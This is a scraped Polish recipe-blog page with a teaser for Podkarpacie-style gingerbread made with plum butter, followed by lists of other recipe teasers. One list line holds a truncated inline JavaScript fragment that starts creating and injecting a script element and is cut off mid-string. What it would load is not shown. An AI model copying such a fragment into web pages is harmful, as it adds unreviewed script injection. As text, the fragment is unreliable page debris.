Piernik z powidłami – kuchnia podkarpacka
Źródło: https://trzecitalerz.blogspot.com/2023/12/piernik-z-powidami-kuchnia-podkarpacka.html
Piernik z powidłami – kuchnia podkarpackaLokalizacja: Gmina DębicaJak powszechnie wiadomo, piernik i powidła to para idealna. Zwykle używa się ich do przełożenia warstw upieczonego piernika, ale bywa i tak, że powidła są jednym ze składników samego ciasta. Dzięki temu piernik jest bardziej wilgotny i ma lekko śliwkowy posmak. Proponuję również posmarować cienko powidłami...
Najnowsze przepisy
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 14
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 18
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 20
Pyszny przepis na noodle z mięsem mielonym. Szybki,... ⇖ 20
Wyobraź sobie ten moment: wyjmujesz z piekarnika idealną... ⇖ 12
Przepisy z bloga
Pierogi ruskie z miętą - kuchnia podkarpackaPierogi... ⇖ 97
Makownik – kuchnia podkarpackaLokalizacja: Nowosiółki... ⇖ 481
Makówka wigilijna – kuchnia podkarpacka Lokalizacja:... ⇖ 323
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 355
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 261
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 206
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 176
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 168
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 150
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 68
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 64









































